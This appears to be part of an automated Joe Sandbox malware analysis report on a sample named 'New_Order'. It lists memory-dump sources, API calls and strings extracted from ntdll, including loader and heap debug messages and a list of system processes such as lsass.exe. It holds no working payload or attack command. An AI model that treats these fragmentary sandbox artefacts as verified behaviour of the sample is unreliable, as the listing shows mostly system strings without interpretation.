                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 1f29T718$1f29T718
                                                                                                • API String ID: 1836367815-1459837916
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(004197AD,?,?,004197AD,?,?,?,004197AD,?,00002000), ref: 004284AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(0041207F,?,0041207F,?,00000000,0041207F,?,0041207F,?,?), ref: 00428502
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ExitProcess.KERNEL32(?,00000000,?,?,36AF85BC,?,?,36AF85BC), ref: 00428547
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01338E3F
                                                                                                • The critical section is owned by thread %p., xrefs: 01338E69
                                                                                                • The resource is owned shared by %d threads, xrefs: 01338E2E
                                                                                                • The resource is owned exclusively by thread %p, xrefs: 01338E24
                                                                                                • *** enter .exr %p for the exception record, xrefs: 01338FA1
                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01338D8C
                                                                                                • *** then kb to get the faulting stack, xrefs: 01338FCC
                                                                                                • *** Inpage error in %ws:%s, xrefs: 01338EC8
                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01338DB5
                                                                                                • a NULL pointer, xrefs: 01338F90
                                                                                                • *** enter .cxr %p for the context, xrefs: 01338FBD
                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01338DD3
                                                                                                • <unknown>, xrefs: 01338D2E, 01338D81, 01338E00, 01338E49, 01338EC7, 01338F3E
                                                                                                • an invalid address, %p, xrefs: 01338F7F
                                                                                                • Go determine why that thread has not released the critical section., xrefs: 01338E75
                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01338F26
                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01338F2D
                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01338E02
                                                                                                • read from, xrefs: 01338F5D, 01338F62
                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01338F3F
                                                                                                • write to, xrefs: 01338F56
                                                                                                • This failed because of error %Ix., xrefs: 01338EF6
                                                                                                • The instruction at %p tried to %s , xrefs: 01338F66
                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01338FEF
                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01338E86
                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01338DC4
                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01338E4B
                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01338F34
                                                                                                • The instruction at %p referenced memory at %p., xrefs: 01338EE2
                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01338DA3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                • API String ID: 0-108210295
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2160512332
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • double initialized or corrupted critical section, xrefs: 012F5508
                                                                                                • corrupted critical section, xrefs: 012F54C2
                                                                                                • Critical section debug info address, xrefs: 012F541F, 012F552E
                                                                                                • Thread identifier, xrefs: 012F553A
                                                                                                • undeleted critical section in freed memory, xrefs: 012F542B
                                                                                                • 8, xrefs: 012F52E3
                                                                                                • Critical section address, xrefs: 012F5425, 012F54BC, 012F5534
                                                                                                • Invalid debug info address of this critical section, xrefs: 012F54B6
                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012F540A, 012F5496, 012F5519
                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 012F5543
                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012F54CE
                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012F54E2
                                                                                                • Critical section address., xrefs: 012F5502
                                                                                                • Address of the debug info found in the active list., xrefs: 012F54AE, 012F54FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                • API String ID: 0-2368682639
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012F24C0
                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012F2412
                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012F2624
                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012F22E4
                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012F2506
                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012F2409
                                                                                                • @, xrefs: 012F259B
                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012F25EB
                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 012F261F
                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012F2498
                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012F2602
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                • API String ID: 0-4009184096
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                • API String ID: 0-2515994595
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                • API String ID: 0-3197712848
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                • API String ID: 0-1700792311
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • VerifierDebug, xrefs: 01308CA5
                                                                                                • VerifierDlls, xrefs: 01308CBD
                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01308B8F
                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01308A3D
                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01308A67
                                                                                                • VerifierFlags, xrefs: 01308C50
                                                                                                • HandleTraces, xrefs: 01308C8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                • API String ID: 0-3223716464
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                • API String ID: 0-1109411897
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-792281065
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012D9A11, 012D9A3A
                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012D9A2A
                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012D9A01
                                                                                                • apphelp.dll, xrefs: 01276496
                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012D99ED
                                                                                                • LdrpInitShimEngine, xrefs: 012D99F4, 012D9A07, 012D9A30
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-204845295
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 012F2165
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012F2178
                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012F219F
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012F2180
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012F21BF
                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 012F2160, 012F219A, 012F21BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                • API String ID: 0-861424205
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012BC6C3
                                                                                                • LdrpInitializeProcess, xrefs: 012BC6C4
                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 012F8170
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 012F8181, 012F81F5
                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 012F81E5
                                                                                                • LdrpInitializeImportRedirection, xrefs: 012F8177, 012F81EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-475462383
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 012C2DF0: LdrInitializeThunk.NTDLL ref: 012C2DFA
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0BA3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0BB6
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0D60
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0D74
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 1404860816-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                • API String ID: 0-379654539
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • @, xrefs: 012B8591
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012B8421
                                                                                                • LdrpInitializeProcess, xrefs: 012B8422
                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012B855E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1918872054
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012F21D9, 012F22B1
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 012F21DE
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012F22B6
                                                                                                • .Local, xrefs: 012B28D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                • API String ID: 0-1239276146
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 012F342A
                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 012F3456
                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 012F3437
                                                                                                • RtlDeactivateActivationContext, xrefs: 012F3425, 012F3432, 012F3451
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                • API String ID: 0-1245972979
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012E1028
                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012E106B
                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012E0FE5
                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012E10AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                • API String ID: 0-1468400865
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 012F365C
                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 012F362F
                                                                                                • LdrpFindDllActivationContext, xrefs: 012F3636, 012F3662
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 012F3640, 012F366C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 0-3779518884
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012EA9A2
                                                                                                • LdrpDynamicShimModule, xrefs: 012EA998
                                                                                                • apphelp.dll, xrefs: 012A2462
                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012EA992
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-176724104
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0129327D
                                                                                                • HEAP: , xrefs: 01293264
                                                                                                • HEAP[%wZ]: , xrefs: 01293255
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                • API String ID: 0-617086771
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-4253913091
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
